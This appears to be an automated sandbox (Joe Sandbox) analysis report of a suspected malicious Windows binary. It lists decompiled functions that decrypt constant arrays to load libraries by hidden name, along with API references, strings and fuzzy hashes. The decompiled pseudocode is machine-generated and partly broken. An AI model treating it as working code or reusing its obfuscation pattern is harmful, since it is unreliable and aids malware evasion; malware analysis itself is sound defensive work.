0x00408f62
0x00408f6c
0x00408f76
0x00408f80
0x00408f8a
0x00408f94
0x00408f9e
0x00408fa8
0x00408fb2
0x00408fbc
0x00408fc6
0x00408fd0
0x00408fda
0x00408fe4
0x00408fee
0x00408ff8
0x00409002
0x0040900c
0x00409016
0x00409020
0x0040902a
0x00409034
0x0040903e
0x00409048
0x00409052
0x0040905c
0x00409066
0x00409070
0x0040907a
0x00409084
0x0040908e
0x00409098
0x004090a2
0x004090ac
0x004090b6
0x004090c0
0x004090ca
0x004090d4
0x004090de
0x004090e8
0x004090f2
0x004090fc
0x00409106
0x00409110
0x0040911a
0x00409124
0x0040912e
0x00409138
0x00409142
0x0040914c
0x00409156
0x00409160
0x0040916a
0x00409174
0x0040917e
0x00409188
0x00409192
0x0040919c
0x004091a6
0x004091b0
0x004091ba
0x004091c4
0x004091ce
0x004091d8
0x004091e2
0x004091ec
0x004091f6
0x00409200
0x0040920a
0x00409214
0x0040921e
0x00409228
0x00409232
0x0040923c
0x00409246
0x00409250
0x0040925a
0x00409264
0x0040926e
0x00409278
0x00409282
0x0040928c
0x00409296
0x004092a0
0x004092aa
0x004092b4
0x004092be
0x004092c8
0x004092d2
0x004092dc
0x004092e6
0x004092f0
0x004092fa
0x00409304
0x0040930e
0x00409318
0x00409322
0x0040932c
0x00409336
0x00409340
0x0040934a
0x00409354
0x0040935e
0x00409368
0x00409372
0x0040937c
0x00409386
0x00409390
0x0040939a
0x004093a4
0x004093ae
0x004093b8
0x004093c2
0x004093cc
0x004093d6
0x004093e0
0x004093ea
0x004093f4
0x004093fe
0x00409408
0x00409412
0x0040941c
0x00409426
0x00409430
0x0040943a
0x00409444
0x0040944e
0x00409458
0x00409462
0x00409469
0x00409470
0x00409477
0x0040947e
0x00409485
0x00409496
0x004094a2
0x004094a9
0x004094b0
0x004094b7
0x004094be
0x004094c5
0x004094cc
0x004094d3
0x004094da
0x004094e1
0x004094e8
0x004094ef
0x004094f6
0x004094fd
0x00409504
0x0040950b
0x00409512
0x00409519
0x00409520
0x00409527
0x0040952e
0x00409535
0x0040953c
0x00409543
0x0040954a
0x00409559
0x00409565
0x00409571
0x00409577
0x0040957d
0x00409580
0x00409588
0x0040958d
0x0040958e
0x0040958f
0x00409590
0x00409591
0x00409592
0x00409593
0x00409594
0x00409595
0x00409596
0x004095a8
0x00409582
0x00409582
0x00409587
0x00409587

APIs

LoadLibraryW.KERNEL32(00000000), ref: 0040955C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040956A
HeapFree.KERNEL32(00000000), ref: 00409571

Strings

[!N, xrefs: 00408B3E
M`pO, xrefs: 00408CEC
s%, xrefs: 00408DF0
^k@h, xrefs: 004093CC
%H, xrefs: 00409368
<0DR, xrefs: 00408DFA
<7#, xrefs: 00409477
Z, xrefs: 00408C9C
Z^, xrefs: 0040941C
k0, xrefs: 00408C7E

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: k0$<0DR$<7#$M`pO$Z$^k@h$%H$[!N$s%$Z^
API String ID: 872250060-2301064221
Opcode ID: b2bc6f2687b62b3bc4f5d3cc4ea8a420adefba6c8712d730e337ea146c8ac270
Instruction ID: 296f9bc11d951d9309a5d0fd035da5fc33b7004e94f84bb103b8a076c5f6b605
Opcode Fuzzy Hash: b2bc6f2687b62b3bc4f5d3cc4ea8a420adefba6c8712d730e337ea146c8ac270
Instruction Fuzzy Hash: 7922C7B48163A9CBDB62DF8299897CDBB74FB11344F6086C9D1593B214CB750B82CF89

Uniqueness

Uniqueness Score: 100.00%

Function 004024B6, Relevance: 15.1, APIs: 10, Instructions: 102
memorystringCOMMON

C-Code - Quality: 36%

			E004024B6(int __ecx) {
				long* _t25;
				short* _t29;
				void* _t30;
				int _t46;
				int _t48;
				void* _t50;
				void* _t51;
				long* _t55;
				int _t59;
				signed int _t61;
				void* _t63;
				void* _t65;
				long _t66;
				WCHAR* _t68;
				void* _t69;

				 *(_t69 - 8) = 0;
				_t48 = 0;
				 *(_t69 - 0xc) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0;
				_t25 = __ecx + 4;
				_t59 = 0;
				 *(_t69 - 0x10) = _t25;
				 *_t25 = 0;
				L00401BE0(0x402410, _t69 - 8);
				_t63 =  *(_t69 - 8);
				while(_t63 != 0) {
					_t6 = _t63 + 4; // 0x4
					_t46 = lstrlenW(_t6);
					_t63 =  *_t63;
					_t48 = _t48 + 1 + _t46;
				}
				_t29 = RtlAllocateHeap(GetProcessHeap(), 8, _t48 + _t48);
				 *(_t69 - 4) = _t29;
				if(_t29 == 0) {
					_t59 =  *(_t69 - 0xc);
				} else {
					_t50 =  *(_t69 - 8);
					while(_t50 != 0) {
						_t10 = _t50 + 4; // 0x4
						_t68 = _t10;
						lstrcpyW( &(_t29[_t59]), _t68);
						_t61 = _t59 + lstrlenW(_t68);
						_t29 =  *(_t69 - 4);
						_t29[_t61] = 0x2c;
						_t59 = _t61 + 1;
						_t50 =  *_t50;
					}
					_t51 = 0;
					_t66 = WideCharToMultiByte(0xfde9, 0, _t29, _t59, 0, 0, 0, 0);
					 *(_t69 - 0x14) = _t66;
					if(_t66 != 0) {
						_t51 = RtlAllocateHeap(GetProcessHeap(), 8, _t66);
						if(_t51 == 0) {
							goto L11;
						} else {
							goto 0x420916;
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							WideCharToMultiByte();
							_t55 =  *(_t69 - 0x10);
							if(_t55 != 0) {
								 *_t55 =  *(_t69 - 0x14);
							}
						}
					}
					goto 0x420936;
					asm("int3");
					 *_t59 = _t51;
					HeapFree(GetProcessHeap(), ??, ??);
				}
				_t30 =  *(_t69 - 8);
				if(_t30 != 0) {
					do {
						_t65 =  *_t30;
						HeapFree(GetProcessHeap(), 0, _t30);
						_t30 = _t65;
					} while (_t65 != 0);
				}
				return 0 |  *_t59 != 0x00000000;
			}

0x004024b8
0x004024c0
0x004024c2
0x004024c6
0x004024cb
0x004024d4
0x004024d6
0x004024d9
0x004024db
0x004024e0
0x004024e5
0x004024f0
0x004024f4
0x004024fa
0x004024fd
0x004024ff
0x00402510
0x00402516
0x0040251b
0x004025c5
0x00402521
0x00402521
0x00402526
0x00402528
0x00402528
0x00402530
0x0040253d
0x00402544
0x00402547
0x0040254b
0x0040254c
0x0040254e
0x00402552
0x00402566
0x00402568
0x0040256d
0x0040257f
0x00402583
0x00000000
0x00402585
0x00402585
0x0040258a
0x0040258b
0x0040258c
0x0040258d
0x0040258e
0x0040258f
0x00402590
0x00402591
0x00402592
0x00402593
0x00402594
0x00402595
0x00402596
0x00402597
0x0040259d
0x004025a2
0x004025a7
0x004025a7
0x004025a2
0x00402583
0x004025ae
0x004025b3
0x004025b4
0x004025bd
0x004025bd
0x004025c8
0x004025cd
0x004025d0
0x004025d0
0x004025dc
0x004025e2
0x004025e4
0x004025d0
0x004025f5

APIs

lstrlenW.KERNEL32(00000004), ref: 004024F4
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00402509
RtlAllocateHeap.NTDLL(00000000), ref: 00402510
lstrcpyW.KERNEL32(00000000,00000004), ref: 00402530
lstrlenW.KERNEL32(00000004), ref: 00402537
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402560
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00402572
RtlAllocateHeap.NTDLL(00000000), ref: 00402579
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004025D5
HeapFree.KERNEL32(00000000), ref: 004025DC

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$Process$Allocatelstrlen$ByteCharFreeMultiWidelstrcpy
String ID:
API String ID: 3825671978-0
Opcode ID: d7f9fa4906b02ec9fa94687583da9beb73f5939de872988a6d8eeae950a3a256
Instruction ID: be411e40b4c1be987272a975dda73e4a30a7c5b0f65e105ee6a1e8751e9d2e4c
Opcode Fuzzy Hash: d7f9fa4906b02ec9fa94687583da9beb73f5939de872988a6d8eeae950a3a256
Instruction Fuzzy Hash: A1318172A01315EFDB109FE4DD88AAF77B8EF84744B054476E905E7291DB789D008BA8

Uniqueness

Uniqueness Score: 1.85%

Function 00406BAA, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 167
memorylibraryUNIQUE

C-Code - Quality: 92%

			E00406BAA(void* __esi, void* __eflags) {
				int _t152;
				void* _t154;
				void* _t159;
				void* _t161;
				void* _t162;
				void* _t163;

				 *((intOrPtr*)(_t163 - 0x24c)) = 0x71744fb1;
				 *((intOrPtr*)(_t163 - 0x248)) = 0x45d6f7ed;
				 *((intOrPtr*)(_t163 - 0x244)) = 0x8dff7e89;
				 *((intOrPtr*)(_t163 - 0x240)) = 0x7ffd7be0;
				 *((intOrPtr*)(_t163 - 0x23c)) = 0x9fdeeae2;
				 *((intOrPtr*)(_t163 - 0x238)) = 0x786d5615;
				 *((intOrPtr*)(_t163 - 0x234)) = 0x604ea1f7;
				 *((intOrPtr*)(_t163 - 0x230)) = 0x411f1ad5;
				 *((intOrPtr*)(_t163 - 0x22c)) = 0xa612af75;
				 *((intOrPtr*)(_t163 - 0x228)) = 0x35c83646;
				 *((intOrPtr*)(_t163 - 0x224)) = 0xda68584a;
				 *((intOrPtr*)(_t163 - 0x220)) = 0xf9c4ef99;
				 *((intOrPtr*)(_t163 - 0x21c)) = 0x1ffb17c6;
				 *((intOrPtr*)(_t163 - 0x218)) = 0x2a559a64;
				 *((intOrPtr*)(_t163 - 0x214)) = 0x349ee742;
				 *((intOrPtr*)(_t163 - 0x210)) = 0x4a11520f;
				 *((intOrPtr*)(_t163 - 0x20c)) = 0x1b55063a;
				 *((intOrPtr*)(_t163 - 0x208)) = 0x1fbc74ec;
				 *((intOrPtr*)(_t163 - 0x204)) = 0x8afa589d;
				 *((intOrPtr*)(_t163 - 0x200)) = 0xe126f3ae;
				 *((intOrPtr*)(_t163 - 0x1fc)) = 0x1298effd;
				 *((intOrPtr*)(_t163 - 0x1f8)) = 0x551a0a77;
				 *((intOrPtr*)(_t163 - 0x1f4)) = 0x1eb6f591;
				 *((intOrPtr*)(_t163 - 0x1f0)) = 0xc744f596;
				 *((intOrPtr*)(_t163 - 0x1ec)) = 0x2d03d841;
				 *((intOrPtr*)(_t163 - 0x1e8)) = 0x748f9909;
				 *((intOrPtr*)(_t163 - 0x1e4)) = 0x6f96c2cf;
				 *((intOrPtr*)(_t163 - 0x1e0)) = 0xda278cdd;
				 *((intOrPtr*)(_t163 - 0x1dc)) = 0x4b1980d2;
				 *((intOrPtr*)(_t163 - 0x1d8)) = 0xb6d4c647;
				 *((intOrPtr*)(_t163 - 0x1d4)) = 0x6e4a8f8c;
				 *((intOrPtr*)(_t163 - 0x1d0)) = 0x806b9650;
				 *((intOrPtr*)(_t163 - 0x1cc)) = 0xb1bcf103;
				 *((intOrPtr*)(_t163 - 0x1c8)) = 0x74c5c597;
				 *((intOrPtr*)(_t163 - 0x1c4)) = 0xdfc78e4f;
				 *((intOrPtr*)(_t163 - 0x1c0)) = 0x58f7a652;
				 *((intOrPtr*)(_t163 - 0x1bc)) = 0xb120ea26;
				 *((intOrPtr*)(_t163 - 0x1b8)) = 0xfcfae165;
				 *((intOrPtr*)(_t163 - 0x1b4)) = 0x3808541e;
				 *((intOrPtr*)(_t163 - 0x1b0)) = 0x955dd695;
				 *((intOrPtr*)(_t163 - 0x1ac)) = 0x9ecdac3a;
				 *((intOrPtr*)(_t163 - 0x1a8)) = 0x8ed5f281;
				 *((intOrPtr*)(_t163 - 0x1a4)) = 0x6bdaf004;
				 *((intOrPtr*)(_t163 - 0x1a0)) = 0xb3361c8c;
				 *((intOrPtr*)(_t163 - 0x19c)) = 0x83fe0156;
				 *((intOrPtr*)(_t163 - 0x198)) = 0x60152a13;
				 *((intOrPtr*)(_t163 - 0x194)) = 0x21a109a0;
				 *((intOrPtr*)(_t163 - 0x190)) = 0xae50f5aa;
				 *((intOrPtr*)(_t163 - 0x18c)) = 0xe5d42415;
				 *((intOrPtr*)(_t163 - 0x188)) = 0xff326d0f;
				 *((intOrPtr*)(_t163 - 0x184)) = 0x33dc58fa;
				 *((intOrPtr*)(_t163 - 0x180)) = 0xd788fcbe;
				 *((intOrPtr*)(_t163 - 0x17c)) = 0x52185b40;
				 *((intOrPtr*)(_t163 - 0x178)) = 0x40a35bee;
				 *((intOrPtr*)(_t163 - 0x174)) = 0x2a5f460b;
				 *((intOrPtr*)(_t163 - 0x170)) = 0x32ba9a31;
				 *((intOrPtr*)(_t163 - 0x16c)) = 0xca034b44;
				 *((intOrPtr*)(_t163 - 0x168)) = 0x54132d4f;
				 *((intOrPtr*)(_t163 - 0x164)) = 0x91ae1d70;
				 *((intOrPtr*)(_t163 - 0x160)) = 0x7ac24f93;
				 *((intOrPtr*)(_t163 - 0x15c)) = 0xf37f4232;
				 *((intOrPtr*)(_t163 - 0x158)) = 0xa6615044;
				 *((intOrPtr*)(_t163 - 0x154)) = 0xc47febf8;
				 *((intOrPtr*)(_t163 - 0x150)) = 0xb29e162d;
				 *((intOrPtr*)(_t163 - 0x14c)) = 0x21378b1c;
				 *((intOrPtr*)(_t163 - 0x148)) = 0x78a5ce5c;
				 *((intOrPtr*)(_t163 - 0x144)) = 0x61bc1d21;
				 *((intOrPtr*)(_t163 - 0x140)) = 0xea2ecede;
				 *((intOrPtr*)(_t163 - 0x13c)) = 0xa791dede;
				 *((intOrPtr*)(_t163 - 0x138)) = 0xa7887afd;
				 *((intOrPtr*)(_t163 - 0x134)) = 0xe171ecb5;
				 *((intOrPtr*)(_t163 - 0x130)) = 0xce33962f;
				 *((intOrPtr*)(_t163 - 0x12c)) = 0xb256e05d;
				 *((intOrPtr*)(_t163 - 0x128)) = 0xa0cac220;
				 *((intOrPtr*)(_t163 - 0x124)) = 0xee34e364;
				 *((intOrPtr*)(_t163 - 0x120)) = 0x6e140336;
				 *((intOrPtr*)(_t163 - 0x11c)) = 0x60420845;
				 *((intOrPtr*)(_t163 - 0x118)) = 0x9392cfe6;
				 *((intOrPtr*)(_t163 - 0x114)) = 0x5f5c3139;
				 *((intOrPtr*)(_t163 - 0x110)) = 0x81289ce0;
				 *((intOrPtr*)(_t163 - 0x10c)) = 0x36617698;
				 *((intOrPtr*)(_t163 - 0x108)) = 0x64028be8;
				 *((intOrPtr*)(_t163 - 0x104)) = 0x3b8df82c;
				 *((intOrPtr*)(_t163 - 0x100)) = 0xf98f5a76;
				 *((intOrPtr*)(_t163 - 0xfc)) = 0x7e1fec4c;
				 *((intOrPtr*)(_t163 - 0xf8)) = 0x42677be5;
				 *((intOrPtr*)(_t163 - 0xf4)) = 0xc60b584c;
				 *((intOrPtr*)(_t163 - 0xf0)) = 0x5fcd2f06;
				 *((intOrPtr*)(_t163 - 0xec)) = 0xf8cbcfec;
				 *((intOrPtr*)(_t163 - 0xe8)) = 0xe5761a4b;
				 *((intOrPtr*)(_t163 - 0xe4)) = 0x7e5f1912;
				 *((intOrPtr*)(_t163 - 0xe0)) = 0x4566e5df;
				 *((intOrPtr*)(_t163 - 0xdc)) = 0x31d3fc58;
				 *((intOrPtr*)(_t163 - 0xd8)) = 0x42ad45b1;
				 *((intOrPtr*)(_t163 - 0xd4)) = 0x26c6e81f;
				 *((intOrPtr*)(_t163 - 0xd0)) = 0x8c35f216;
				 *((intOrPtr*)(_t163 - 0xcc)) = 0xc57f604d;
				 *((intOrPtr*)(_t163 - 0xc8)) = 0xc680fd1c;
				 *((intOrPtr*)(_t163 - 0xc4)) = 0x2d8c26d6;
				 *((intOrPtr*)(_t163 - 0xc0)) = 0xa880798f;
				 *((intOrPtr*)(_t163 - 0xbc)) = 0x2b922658;
				 *((intOrPtr*)(_t163 - 0xb8)) = 0xea5892d;
				 *((intOrPtr*)(_t163 - 0xb4)) = 0x7097e74b;
				 *((intOrPtr*)(_t163 - 0xb0)) = 0x9e4287c3;
				 *((intOrPtr*)(_t163 - 0xac)) = 0x7ddd092d;
				 *((intOrPtr*)(_t163 - 0xa8)) = 0x9d72876c;
				 *((intOrPtr*)(_t163 - 0xa4)) = 0x687954f0;
				 *((intOrPtr*)(_t163 - 0xa0)) = 0xdc560dfd;
				 *((intOrPtr*)(_t163 - 0x9c)) = 0xc6ae8e76;
				 *((intOrPtr*)(_t163 - 0x98)) = 0x8b8a62f4;
				 *((intOrPtr*)(_t163 - 0x94)) = 0xecb223eb;
				 *((intOrPtr*)(_t163 - 0x90)) = 0x47121692;
				 *((intOrPtr*)(_t163 - 0x8c)) = 0xae2ee0d3;
				 *((intOrPtr*)(_t163 - 0x88)) = 0x4d4e6b59;
				 *((intOrPtr*)(_t163 - 0x84)) = 0x946b4306;
				 *((intOrPtr*)(_t163 - 0x80)) = 0xd476e44b;
				 *((intOrPtr*)(_t163 - 0x7c)) = 0x18a3fb60;
				 *((intOrPtr*)(_t163 - 0x78)) = 0xd6ef19a3;
				 *((intOrPtr*)(_t163 - 0x74)) = 0x15abf441;
				 *((intOrPtr*)(_t163 - 0x70)) = 0xdec4d0c9;
				 *((intOrPtr*)(_t163 - 0x6c)) = 0xd9403070;
				 *((intOrPtr*)(_t163 - 0x68)) = 0x8e8082e4;
				 *((intOrPtr*)(_t163 - 0x64)) = 0x26487421;
				 *((intOrPtr*)(_t163 - 0x60)) = 0x28c9a878;
				 *((intOrPtr*)(_t163 - 0x5c)) = 0x17178755;
				 *((intOrPtr*)(_t163 - 0x58)) = 0xfdb97c74;
				 *((intOrPtr*)(_t163 - 0x54)) = 0x54f28a82;
				 *((intOrPtr*)(_t163 - 0x50)) = 0x84c7bbdf;
				 *((intOrPtr*)(_t163 - 0x4c)) = 0x16f91cc5;
				 *((intOrPtr*)(_t163 - 0x48)) = 0x744cd88f;
				 *((intOrPtr*)(_t163 - 0x44)) = 0x1b61a938;
				 *((intOrPtr*)(_t163 - 0x40)) = 0x4115c6b9;
				 *((intOrPtr*)(_t163 - 0x3c)) = 0x267599c8;
				 *((intOrPtr*)(_t163 - 0x38)) = 0x648ba3c;
				 *((intOrPtr*)(_t163 - 0x34)) = 0xecb540f7;
				 *((intOrPtr*)(_t163 - 0x30)) = 0x89b84a5;
				 *((intOrPtr*)(_t163 - 0x2c)) = 0xb9e63541;
				 *((intOrPtr*)(_t163 - 0x28)) = 0xa1eb4040;
				 *((intOrPtr*)(_t163 - 0x24)) = 0xac5c6894;
				 *((intOrPtr*)(_t163 - 0x20)) = 0x15e21cd3;
				 *((intOrPtr*)(_t163 - 0x1c)) = 0x8a75a34c;
				 *((intOrPtr*)(_t163 - 0x18)) = 0xeec71677;
				 *((intOrPtr*)(_t163 - 0x14)) = 0x86e6e5b0;
				 *((intOrPtr*)(_t163 - 0x10)) = 0xe0065bd7;
				 *((intOrPtr*)(_t163 - 0xc)) = 0x831cc3a0;
				 *((intOrPtr*)(_t163 - 8)) = 0xdfe1953e;
				 *((intOrPtr*)(_t163 - 4)) = 0x6b032933;
				_t161 = L00401D00(0x412ef0, 0x1ac, _t159);
				 *0x417c74 = LoadLibraryW(_t161);
				_t152 = HeapFree(GetProcessHeap(), 0, _t161);
				_t156 =  *0x417c74;
				_t162 = 0x1f5c6a;
				if( *0x417c74 != 0) {
					goto 0x42167d;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L00401480(_t154, _t156, _t163 - 0x24c, _t159, _t162);
				} else {
					goto 0x42166a;
					return _t152;
				}
			}

0x00406baa
0x00406bb4
0x00406bbe
0x00406bc8
0x00406bd2
0x00406bdc
0x00406be6
0x00406bf0
0x00406bfa
0x00406c04
0x00406c0e
0x00406c18
0x00406c22
0x00406c2c
0x00406c36
0x00406c40
0x00406c4a
0x00406c54
0x00406c5e
0x00406c68
0x00406c72
0x00406c7c
0x00406c86
0x00406c90
0x00406c9a
0x00406ca4
0x00406cae
0x00406cb8
0x00406cc2
0x00406ccc
0x00406cd6
0x00406ce0
0x00406cea
0x00406cf4
0x00406cfe
0x00406d08
0x00406d12
0x00406d1c
0x00406d26
0x00406d30
0x00406d3a
0x00406d44
0x00406d4e
0x00406d58
0x00406d62
0x00406d6c
0x00406d76
0x00406d80
0x00406d8a
0x00406d94
0x00406d9e
0x00406da8
0x00406db2
0x00406dbc
0x00406dc6
0x00406dd0
0x00406dda
0x00406de4
0x00406dee
0x00406df8
0x00406e02
0x00406e0c
0x00406e16
0x00406e20
0x00406e2a
0x00406e34
0x00406e3e
0x00406e48
0x00406e52
0x00406e5c
0x00406e66
0x00406e70
0x00406e7a
0x00406e84
0x00406e8e
0x00406e98
0x00406ea2
0x00406eac
0x00406eb6
0x00406ec0
0x00406ed4
0x00406ee3
0x00406eed
0x00406ef7
0x00406f01
0x00406f0b
0x00406f15
0x00406f1f
0x00406f29
0x00406f33
0x00406f3d
0x00406f47
0x00406f51
0x00406f5b
0x00406f65
0x00406f6f
0x00406f79
0x00406f83
0x00406f8d
0x00406f97
0x00406fa1
0x00406fab
0x00406fb5
0x00406fbf
0x00406fc9
0x00406fd3
0x00406fdd
0x00406fe7
0x00406ff1
0x00406ffb
0x00407005
0x0040700f
0x00407019
0x00407023
0x0040702d
0x00407037
0x0040703e
0x00407045
0x0040704c
0x00407053
0x0040705a
0x00407061
0x00407068
0x0040706f
0x00407076
0x0040707d
0x00407084
0x0040708b
0x00407092
0x00407099
0x004070a0
0x004070a7
0x004070ae
0x004070b5
0x004070bc
0x004070c3
0x004070ca
0x004070d1
0x004070d8
0x004070df
0x004070e6
0x004070ed
0x004070f4
0x004070fb
0x00407102
0x00407109
0x00407110
0x0040711f
0x0040712b
0x00407137
0x0040713d
0x00407143
0x00407146
0x0040714e
0x00407153
0x00407154
0x00407155
0x00407156
0x00407157
0x00407158
0x00407159
0x0040715a
0x0040715b
0x0040715c
0x0040716e
0x00407148
0x00407148
0x0040714d
0x0040714d

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00407122
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407130
HeapFree.KERNEL32(00000000), ref: 00407137

Strings

YkNM, xrefs: 00407023
d4, xrefs: 00406E8E
91\_, xrefs: 00406EB6
{gB, xrefs: 00406F0B
!tH&, xrefs: 00407068

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: !tH&$91\_$YkNM$d4${gB
API String ID: 872250060-3240151467
Opcode ID: f60bea629545a2dc48392538cab8c66949e51d4bb320f075f1ac50fc8868b6e7
Instruction ID: 4f968eef7536348244204185b7dcdfbfabe352056c391db8f72768d415b0f1a9
Opcode Fuzzy Hash: f60bea629545a2dc48392538cab8c66949e51d4bb320f075f1ac50fc8868b6e7
Instruction Fuzzy Hash: C1C196B4C463A9CFDB619F829A847DDBA31BB15300F6082C9D5593F314CB750A81CF8A

Uniqueness

Uniqueness Score: 100.00%

Function 004010C3, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 36memoryUNIQUE

APIs

_snwprintf.NTDLL ref: 004010E2
GetProcessHeap.KERNEL32(?,00000000), ref: 004010ED
HeapFree.KERNEL32(00000000,?,00000000), ref: 004010F4
CreateEventW.KERNEL32(?,00000001,?,?,?,00000000), ref: 00401105
SetEvent.KERNEL32(00000000,?,00000001,?,?,?,00000000), ref: 00401112
CloseHandle.KERNEL32(00000000), ref: 00401119
CloseHandle.KERNEL32(00000000), ref: 00401125

Strings

A, xrefs: 004010C6

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: CloseEventHandleHeap$CreateFreeProcess_snwprintf
String ID: A
API String ID: 1176111436-1398000214
Opcode ID: 37e96361220e7d460a0d897dc9e6174296f5d1537de0861e12547426b25a1ec3
Instruction ID: f077c3ca8fe3f016a3bb02566088b42ad31878ee07aed05963f7f41a20d7b58a
Opcode Fuzzy Hash: 37e96361220e7d460a0d897dc9e6174296f5d1537de0861e12547426b25a1ec3
Instruction Fuzzy Hash: 8CF0FCB2801510FBC7125BB0AC0CFDF3A39DF85701F008076F509A2251DB3C85008B5D

Uniqueness

Uniqueness Score: 100.00%

Function 0040843A, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 195
memorylibraryUNIQUE

C-Code - Quality: 93%

			E0040843A(void* __esi, void* __eflags) {
				int _t180;
				void* _t182;
				void* _t187;
				void* _t189;
				void* _t190;
				void* _t191;

				 *((intOrPtr*)(_t191 - 0x2bc)) = 0xffb6f3db;
				 *((intOrPtr*)(_t191 - 0x2b8)) = 0x42ee5917;
				 *((intOrPtr*)(_t191 - 0x2b4)) = 0xcb3b48c1;
				 *((intOrPtr*)(_t191 - 0x2b0)) = 0xa6520082;
				 *((intOrPtr*)(_t191 - 0x2ac)) = 0x5978cda3;
				 *((intOrPtr*)(_t191 - 0x2a8)) = 0x8eeb0cef;
				 *((intOrPtr*)(_t191 - 0x2a4)) = 0x7c3c2616;
				 *((intOrPtr*)(_t191 - 0x2a0)) = 0xf9e12a7d;
				 *((intOrPtr*)(_t191 - 0x29c)) = 0xd1129a86;
				 *((intOrPtr*)(_t191 - 0x298)) = 0x19026469;
				 *((intOrPtr*)(_t191 - 0x294)) = 0x81808771;
				 *((intOrPtr*)(_t191 - 0x290)) = 0xb80a64b0;
				 *((intOrPtr*)(_t191 - 0x28c)) = 0x567d0021;
				 *((intOrPtr*)(_t191 - 0x288)) = 0x84daafe4;
				 *((intOrPtr*)(_t191 - 0x284)) = 0x52328f;
				 *((intOrPtr*)(_t191 - 0x280)) = 0x79c5bc63;
				 *((intOrPtr*)(_t191 - 0x27c)) = 0x18ee37f2;
				 *((intOrPtr*)(_t191 - 0x278)) = 0x759352e0;
				 *((intOrPtr*)(_t191 - 0x274)) = 0x972b7044;
				 *((intOrPtr*)(_t191 - 0x270)) = 0xb36a66b1;
				 *((intOrPtr*)(_t191 - 0x26c)) = 0x2522e1d5;
				 *((intOrPtr*)(_t191 - 0x268)) = 0xcaea6a5e;
				 *((intOrPtr*)(_t191 - 0x264)) = 0xaec4e5b9;
				 *((intOrPtr*)(_t191 - 0x260)) = 0x8a5f01fa;
				 *((intOrPtr*)(_t191 - 0x25c)) = 0xbb77f3f7;
				 *((intOrPtr*)(_t191 - 0x258)) = 0x50f1bf85;
				 *((intOrPtr*)(_t191 - 0x254)) = 0xe281bbb7;
				 *((intOrPtr*)(_t191 - 0x250)) = 0x998865c4;
				 *((intOrPtr*)(_t191 - 0x24c)) = 0x62370433;
				 *((intOrPtr*)(_t191 - 0x248)) = 0xa291a2b3;
				 *((intOrPtr*)(_t191 - 0x244)) = 0xbba8d9cf;
				 *((intOrPtr*)(_t191 - 0x240)) = 0x91a70b;
				 *((intOrPtr*)(_t191 - 0x23c)) = 0x9c03d728;
				 *((intOrPtr*)(_t191 - 0x238)) = 0x847a151e;
				 *((intOrPtr*)(_t191 - 0x234)) = 0x2304bff;
				 *((intOrPtr*)(_t191 - 0x230)) = 0xbed58740;
				 *((intOrPtr*)(_t191 - 0x22c)) = 0x1c2240c7;
				 *((intOrPtr*)(_t191 - 0x228)) = 0x12d0bb03;
				 *((intOrPtr*)(_t191 - 0x224)) = 0xe98e44a1;
				 *((intOrPtr*)(_t191 - 0x220)) = 0x7a77d8c4;
				 *((intOrPtr*)(_t191 - 0x21c)) = 0xdcd3285e;
				 *((intOrPtr*)(_t191 - 0x218)) = 0xe0b58a70;
				 *((intOrPtr*)(_t191 - 0x214)) = 0xaf855e10;
				 *((intOrPtr*)(_t191 - 0x210)) = 0x368de6d9;
				 *((intOrPtr*)(_t191 - 0x20c)) = 0x40b905fa;
				 *((intOrPtr*)(_t191 - 0x208)) = 0x74f97d88;
				 *((intOrPtr*)(_t191 - 0x204)) = 0x55b6dcc6;
				 *((intOrPtr*)(_t191 - 0x200)) = 0xb1cc33f;
				 *((intOrPtr*)(_t191 - 0x1fc)) = 0xc3456997;
				 *((intOrPtr*)(_t191 - 0x1f8)) = 0xdd35737e;
				 *((intOrPtr*)(_t191 - 0x1f4)) = 0xb36b92a9;
				 *((intOrPtr*)(_t191 - 0x1f0)) = 0xde8e79a1;
				 *((intOrPtr*)(_t191 - 0x1ec)) = 0xf23453a2;
